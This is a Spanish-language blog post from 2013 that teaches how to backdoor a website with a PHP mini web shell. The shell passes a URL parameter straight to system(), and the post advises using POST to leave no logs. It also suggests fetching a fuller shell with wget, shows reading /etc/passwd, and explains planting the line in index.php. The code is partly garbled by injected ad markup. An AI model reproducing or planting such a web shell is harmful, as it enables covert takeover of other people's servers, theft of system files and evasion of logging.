martes, 19 de marzo de 2013

Creando una mini Shell en PHP



Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El código sería así:


"GET" action="">
<class="IL_AD" id="IL_AD3">input type="text" name="comando">
"submit" value="enviar">
if(isset($_GET['comando'])){
$var = class="IL_AD" id="IL_AD9">system($_GET['comando']);
echo $var;
}
?>
En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:




Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.
En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecutó satisfactoriamente.

Otra cosa que podemos hacer es poner

$lol = @"http://www.php.net/system">system($_GET['comando']);

En algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat /etc/passwd
Espero les haya servido.
Saludos.